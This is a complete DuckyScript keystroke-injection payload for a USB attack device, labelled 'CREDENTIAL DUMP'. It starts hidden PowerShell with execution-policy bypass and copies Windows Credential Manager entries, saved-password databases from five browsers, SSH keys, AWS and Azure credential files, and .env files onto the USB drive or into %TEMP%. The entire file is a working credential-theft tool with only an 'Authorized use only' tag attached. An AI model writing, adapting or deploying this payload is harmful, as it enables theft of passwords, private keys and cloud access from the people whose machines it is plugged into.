REM ============================================================================
REM  CREDENTIAL DUMP — Browser Passwords + Vault + Tokens
REM  ============================================================================
REM  Extracts saved credentials from all major browsers, Windows Credential
REM  Manager, and application tokens. Saves to USB or %TEMP%.
REM  
REM  FLLC | Authorized use only.
REM ============================================================================

DELAY 1500
GUI r
DELAY 600
STRING powershell -W Hidden -NoP -Exec Bypass -C "$d=(Get-WmiObject Win32_LogicalDisk -F 'DriveType=2'|%{$_.DeviceID}|Select -First 1);if(!$d){$d=$env:TEMP};$o=\"$d\creds_$(hostname)_$(Get-Date -f yyyyMMdd)\";md $o -F|Out-Null;cmdkey /list 2>$null|Out-File $o\vault.txt;'Chrome','Edge','Brave','Opera','Vivaldi'|%{$n=$_;$paths=@(\"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data\",\"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data\",\"$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default\Login Data\",\"$env:APPDATA\Opera Software\Opera Stable\Login Data\",\"$env:LOCALAPPDATA\Vivaldi\User Data\Default\Login Data\");$p=$paths|?{Test-Path $_}|Select -First 1;if($p){$tmp=\"$env:TEMP\${n}_login.db\";cp $p $tmp -Force 2>$null;\"$n database copied to $tmp\"|Out-File $o\browsers.txt -Append}};dir $env:USERPROFILE\.ssh\* 2>$null|%{cp $_.FullName $o -Force 2>$null};'AWS','AZURE','GCP'|%{\"=== $_ ===\"|Out-File $o\cloud.txt -Append};if(Test-Path $env:USERPROFILE\.aws\credentials){cp $env:USERPROFILE\.aws\credentials $o\aws_creds.txt 2>$null};if(Test-Path $env:USERPROFILE\.azure){cp $env:USERPROFILE\.azure\* $o\ -Recurse -Force 2>$null};Get-ChildItem $env:USERPROFILE -Filter '.env' -Recurse -Depth 3 -Force 2>$null|%{gc $_.FullName 2>$null|Out-File $o\env_files.txt -Append};'DONE'|Out-File $o\complete.txt"
ENTER
